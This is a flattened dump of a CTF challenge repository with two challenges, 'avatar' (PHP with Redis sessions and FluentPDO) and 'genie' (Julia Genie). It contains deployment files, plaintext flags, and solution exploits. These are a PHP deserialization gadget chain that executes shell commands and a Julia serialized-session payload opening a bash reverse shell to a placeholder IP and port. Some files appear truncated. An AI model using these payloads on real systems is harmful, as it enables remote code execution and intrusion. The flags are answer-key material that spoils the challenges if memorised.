/readflag.c 14 | COPY ./flag/flag /flag 15 | RUN chmod 0400 /flag && chown root:root /flag 16 | RUN chmod 0444 /readflag.c && gcc /readflag.c -o /readflag 17 | RUN chown root:root /readflag && chmod 4555 /readflag 18 | -------------------------------------------------------------------------------- /tsj-ctf/avatar/docker/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.5' 2 | 3 | services: 4 | 5 | redis: 6 | image: redis:alpine 7 | restart: always 8 | volumes: 9 | - ./files/redis.conf:/usr/local/etc/redis/redis.conf:ro 10 | command: redis-server /usr/local/etc/redis/redis.conf 11 | 12 | database: 13 | image: mariadb:10 14 | restart: always 15 | volumes: 16 | - ./files/init.sql:/docker-entrypoint-initdb.d/init.sql:ro 17 | environment: 18 | - MYSQL_RANDOM_ROOT_PASSWORD=1 19 | - MYSQL_USER=user 20 | - MYSQL_PASSWORD=p@55w0rd 21 | - MYSQL_DATABASE=db 22 | 23 | web: 24 | build: ./ 25 | volumes: 26 | - ./files/php.ini:/usr/local/etc/php/conf.d/custom.ini:ro 27 | ports: 28 | - 10004:80/tcp 29 | depends_on: 30 | - redis 31 | - database 32 | -------------------------------------------------------------------------------- /tsj-ctf/avatar/docker/files/init.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE IF NOT EXISTS `users` ( 2 | `id` INT NOT NULL AUTO_INCREMENT, 3 | `username` TEXT NULL DEFAULT NULL, 4 | `password` TEXT NULL DEFAULT NULL, 5 | `avatar` BLOB NULL DEFAULT NULL, 6 | PRIMARY KEY (`id`) 7 | ); 8 | -------------------------------------------------------------------------------- /tsj-ctf/avatar/docker/files/php.ini: -------------------------------------------------------------------------------- 1 | session.save_handler = redis 2 | session.save_path = "tcp://redis:6379?weight=1&?timeout=3" 3 | -------------------------------------------------------------------------------- /tsj-ctf/avatar/docker/flag/flag: -------------------------------------------------------------------------------- 1 | TSJ{byp4ss_redis_s3cur1ty_ch3ck_4nd_pwn} 2 | -------------------------------------------------------------------------------- /tsj-ctf/avatar/docker/flag/readflag.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int argc, char *argv[]) { 4 | seteuid(0); 5 | setegid(0); 6 | setuid(0); 7 | setgid(0); 8 | 9 | if(argc < 5) { 10 | printf("Usage: %s give me the flag\n", argv[0]); 11 | return 1; 12 | } 13 | 14 | if ((strcmp(argv[1], "give") | strcmp(argv[2], "me") | strcmp(argv[3], "the") | strcmp(argv[4], "flag")) != 0) { 15 | puts("You are not worthy"); 16 | return 1; 17 | } 18 | 19 | char flag[256] = { 0 }; 20 | FILE* fp = fopen("/flag", "r"); 21 | if (!fp) { 22 | perror("fopen"); 23 | return 1; 24 | } 25 | if (fread(flag, 1, 256, fp) < 0) { 26 | perror("fread"); 27 | return 1; 28 | } 29 | puts(flag); 30 | fclose(fp); 31 | return 0; 32 | } -------------------------------------------------------------------------------- /tsj-ctf/avatar/docker/src/composer.json: -------------------------------------------------------------------------------- 1 | { 2 | "require": { 3 | "envms/fluentpdo": "2.2.4" 4 | } 5 | } 6 | -------------------------------------------------------------------------------- /tsj-ctf/avatar/docker/src/html/include.php: -------------------------------------------------------------------------------- 1 | alert("Username or password is too short (min 8 characters)"); location.href = "/";'); 7 | } 8 | 9 | $result = $fluent->from('users')->select('username, password')->where('username', $_POST['username'])->fetch(); 10 | 11 | if ($result === false) { 12 | // Auto-register 13 | $fluent->insertInto('users', [ 14 | 'username' => $_POST['username'], 15 | 'password' => $_POST['password'], 16 | ])->execute(); 17 | } else if ($_POST['password'] !== $result['password']) { 18 | die(''); 19 | } 20 | $_SESSION['username'] = $_POST['username']; 21 | header('Location: /'); 22 | } 23 | ?> 24 | -------------------------------------------------------------------------------- /tsj-ctf/avatar/docker/src/html/static/images/default.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/tsj-ctf/avatar/docker/src/html/static/images/default.jpeg -------------------------------------------------------------------------------- /tsj-ctf/avatar/docker/src/html/static/style.css: -------------------------------------------------------------------------------- 1 | @import url("https://fonts.googleapis.com/css2?family=Inconsolata:wght@500&display=swap"); 2 | 3 | body { 4 | width: 100%; 5 | max-width: 40rem; 6 | margin: 1rem auto; 7 | font-family: "Inconsolata", "Consolas", monospace; 8 | } 9 | 10 | main { 11 | margin-top: 0.75rem; 12 | } 13 | 14 | h1, 15 | h2 { 16 | margin: 0; 17 | } 18 | 19 | input[type="text"], input[type="password"] { 20 | padding: 0.25rem; 21 | } 22 | 23 | .avatar { 24 | border-radius: 50%; 25 | } 26 | 27 | .container { 28 | text-align: center; 29 | margin: 5rem; 30 | } 31 | 32 | /* tabs */ 33 | nav > a { 34 | background-color: #777; 35 | border-radius: 5px 5px 0 0; 36 | color: white; 37 | padding: 0.3em; 38 | text-decoration: none; 39 | } 40 | .content { 41 | border: 1px solid lightgray; 42 | display: none; 43 | padding: 32px; 44 | margin-top: 0.3em; 45 | } 46 | .content:target { 47 | display: block; 48 | } 49 | 50 | input[type="file"], 51 | input[type="url"] { 52 | width: 75%; 53 | } 54 | input[type="submit"] { 55 | width: 15%; 56 | } 57 | -------------------------------------------------------------------------------- /tsj-ctf/avatar/exploit/gadgets.php: -------------------------------------------------------------------------------- 1 | structure = new Structure(); 19 | } 20 | } 21 | } 22 | 23 | namespace Envms\FluentPDO\Queries { 24 | use Envms\FluentPDO\{Query, Regex}; 25 | class Select 26 | { 27 | protected $fluent; 28 | protected $regex; 29 | protected $statements = []; 30 | function __construct(string $command='ls -al') 31 | { 32 | $this->fluent = new Query(); 33 | $this->regex = new Regex(); 34 | 35 | $this->statements['GROUP BY'] = ['a:b']; 36 | $this->statements['FROM'] = $command; // argument 37 | } 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /tsj-ctf/avatar/exploit/gen_serialized.php: -------------------------------------------------------------------------------- 1 | /dev/null)" == "" ]; then 8 | docker build -t service:latest ./service 9 | fi 10 | 11 | /usr/bin/node ./server.js 12 | -------------------------------------------------------------------------------- /tsj-ctf/genie/deploy/flag.txt: -------------------------------------------------------------------------------- 1 | TSJ{who_cares_about_padding?!} 2 | -------------------------------------------------------------------------------- /tsj-ctf/genie/deploy/service/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM julia:1.7.2-bullseye 2 | 3 | RUN apt-get update && apt-get install nginx apache2-utils -y && rm -rf /var/lib/apt/lists/* 4 | 5 | RUN useradd -ms /bin/bash web 6 | 7 | USER web 8 | RUN julia -e 'import Pkg;Pkg.add(Pkg.PackageSpec(;name="Genie", version="4.14.0"))' 9 | 10 | USER root 11 | RUN mkdir /app 12 | WORKDIR /app 13 | RUN mkdir uploads sessions 14 | COPY main.jl . 15 | COPY flag.txt . 16 | RUN mv flag.txt flag-$(md5sum flag.txt | cut -d ' ' -f 1 | tr -d '\n').txt 17 | 18 | COPY default.conf /etc/nginx/sites-available/default 19 | COPY start.sh . 20 | 21 | RUN chown -R web:web . 22 | 23 | CMD ["timeout", "600", "./start.sh"] 24 | -------------------------------------------------------------------------------- /tsj-ctf/genie/deploy/service/default.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 3000 default_server; 3 | listen [::]:3000 default_server; 4 | access_log stdout; 5 | error_log stderr; 6 | client_max_body_size 128k; 7 | 8 | location / { 9 | auth_basic "CTF Challenge"; 10 | auth_basic_user_file /app/htpasswd; 11 | proxy_pass http://localhost:8888/; 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /tsj-ctf/genie/deploy/service/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.7' 2 | services: 3 | web: 4 | build: . 5 | init: true 6 | ports: 7 | - 8888:3000 8 | environment: 9 | - USERNAME=user 10 | - PASSWORD=pass 11 | -------------------------------------------------------------------------------- /tsj-ctf/genie/deploy/service/flag.txt: -------------------------------------------------------------------------------- 1 | TSJ{who_cares_about_padding?!} 2 | -------------------------------------------------------------------------------- /tsj-ctf/genie/deploy/service/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | printf "$PASSWORD" | htpasswd -i -c htpasswd "$USERNAME" 3 | nginx & 4 | su web -c 'julia main.jl' 5 | -------------------------------------------------------------------------------- /tsj-ctf/genie/deploy/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | printf "$PASSWORD" | htpasswd -i -c htpasswd "$USERNAME" 3 | nginx & 4 | su web -c 'julia main.jl' 5 | -------------------------------------------------------------------------------- /tsj-ctf/genie/exploit/gen_session.jl: -------------------------------------------------------------------------------- 1 | using Serialization 2 | Serialization.deserialize(s::Serializer, t::Type{BigInt}) = run(`bash -c '/bin/bash -i >& /dev/tcp/IP/PORT 0>&1'`) 3 | filt = filter(methods(Serialization.deserialize).ms) do m 4 | occursin("BigInt", repr(m)) 5 | end 6 | Serialization.serialize("exp", (filt[1], BigInt(48763))) 7 | -------------------------------------------------------------------------------- /tsj-ctf/welcome-to-tsj-ctf/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/tsj-ctf/welcome-to-tsj-ctf/screenshot.png -------------------------------------------------------------------------------- /tsj-ctf/welcome-to-tsj-ctf/www.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/tsj-ctf/welcome-to-tsj-ctf/www.zip --------------------------------------------------------------------------------